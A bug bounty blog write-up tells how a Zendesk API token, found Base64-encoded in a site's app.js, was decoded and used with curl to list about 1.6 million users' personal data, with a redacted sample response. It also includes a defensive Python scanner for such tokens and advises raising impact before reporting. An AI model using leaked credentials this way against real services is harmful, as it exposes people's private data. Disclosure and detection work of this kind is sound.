How I Got Access to 1600k Users' PII Data $$$$

Gokul AP
3 min read · Apr 6, 2022


Hello Guys 👋 I am Gokul, a Python developer, cyber security researcher, part-time bug hunter and open-source tool maker, studying third-year Computer Science Engineering in Madurai, Tamil Nadu!


Hey, let's dive into the main topic. This is my first blog post; I have been trying to write this writeup for a long time but never found the time, and now it's ready!

By the title you might have guessed the content. Let's see how I found that vulnerability, and let's call the target target.com.

One evening I was testing that target. I like to find bugs related to session management and logic errors, so I was testing a login feature: I fired up Burp and manipulated the requests to look for any sensitive actions or responses, but didn't get anything. Usually I only use Intercept, Repeater and Intruder in Burp. That day I decided to look at the Burp HTTP History, saw the whole history of URLs logged there, and scrolled through it looking at the responses that contained JSON, but nothing sensitive!

Then I saw a request to /app.js in that history tab and decided to view its source code. Most JS files have unreadable names like fabi65c78.js, but this app.js caught my eye, because the filename app is usually kept for main files. So I scrolled through the source code of that JS file and found a JSON object inside it which had something like a Zendesk URL, an FB App ID, etc.

At first sight I thought FBAppId was private data, but after researching it I found that it is just public data. Then I found an "access token" in that same JSON and saw that it was Base64 encoded, so I decoded the token and the result was "senior@target.com/token:xxxxxxxx". I then used the Keyhacks repo and found that it was a Zendesk API key!
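The check a defender (or a CI secret scanner) can run over a shipped JavaScript bundle to catch exactly this pattern: Base64 strings that decode to a Zendesk "email/token:secret" pair. This is an added example, not code from the original post; the app.js fragment, the example.com address and the token value are constructed, and the 24-character Base64 threshold is an assumption.

```python
import base64
import binascii
import re

# Long Base64 runs: enough to hold "user@host/token:<secret>" (threshold is an assumption).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
# Decoded shape described in the write-up: "<email>/token:<api token>".
ZENDESK_TOKEN = re.compile(r"^([^\s/@]+@[^\s/]+)/token:([A-Za-z0-9]{8,})$")

# Constructed app.js fragment (not the real target's); the token is a made-up value.
SAMPLE_JS = (
    'window.cfg={"zendeskUrl":"https://example.zendesk.com","fbAppId":"123456789012345",'
    '"accessToken":"c2VuaW9yQGV4YW1wbGUuY29tL3Rva2VuOkFiQ2RFZjAxMjM0NTY3ODk=",'
    '"build":"fabi65c78","logo":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAAB'
    'CAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg=="};'
)


def decode_b64(blob: str):
    """Decode a Base64 run to text; None if it is not valid Base64 or not UTF-8 text."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def find_zendesk_tokens(js_source: str):
    """Scan a JS bundle for Base64 strings that decode to a Zendesk email/token pair.

    Returns (email, masked_token) pairs so a scan report never echoes the full secret.
    Binary blobs (e.g. inline images) decode but fail UTF-8 and are skipped.
    """
    findings = []
    for match in B64_RUN.finditer(js_source):
        text = decode_b64(match.group(0))
        if text is None:
            continue
        hit = ZENDESK_TOKEN.match(text)
        if hit:
            email, token = hit.groups()
            findings.append((email, token[:4] + "..." + token[-2:]))
    return findings


if __name__ == "__main__":
    # Anything a bundle like this exposes is public: the only fix is to remove it and rotate.
    for email, masked in find_zendesk_tokens(SAMPLE_JS):
        print(f"Zendesk API token for {email} shipped in client JS: {masked}")
```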

It was my first API key finding and I was so excited. I was like

Then I was about to report it to the security team! But my mind said:
"You got an API key, but what is it for?" I didn't have any idea what Zendesk was, or even how to use that API key. So I did a little research so that I could increase the impact. I referred to many sites and found some documentation which mentioned https://{target}.zendesk.com/api/v1/users.json, and I decided to authenticate against this API endpoint with the API key. First I curled it without the key:

curl https://{target}.zendesk.com/api/v1/users.json

The response was:

{"error":"Couldn't authenticate you"}

Then I used the API key:

curl https://{target}.zendesk.com/api/v1/users.json -u (API_KEY)

The response was:

{
  "users": [
    {
      "id": 123xxxxx,
      "name": "Victim",
      "email": "victim@gmail.com",
      "created_at": "2015-11-25T06:00:20Z",
      "updated_at": "2015-11-25T06:00:20Z",
      "time_zone": "Ekaterinburg",
      "iana_time_zone": "Asia/Yekaterinburg",
      "phone": xxxxxxxxxx,
      "shared_phone_number": null,
      "photo": null,
      "locale_id": 1,
      "locale": "en-US",
      "organization_id": null,
      "role": "end-user",
      "verified": false,
      "external_id": null,
      "tags": [],
      "alias": null,
      "active": true,
      "shared": false,
      "shared_agent": false,
      "last_login_at": null,
      "two_factor_auth_enabled": false,
      "signature": null,
      "details": null,
      "notes": null,
      "role_type": null,
      "custom_role_id": null,
      "system::embeddable_last_seen": null
    },
    ..........
    ..........
  ],
  "count": 1645729
}

I had got access to the PII details of around 16 lakh (1.6 million) users!

Timeline:

  • Reported: March 6th 2022
  • Triaged: March 10th 2022
  • Confirmation: March 14th 2022
  • Bounty: $1500

Tips:

  1. Always check the Burp history.
  2. Don't report as soon as you find something; increase the impact, then report.

Thanks for reading my writeup. I will write more writeups in the future!
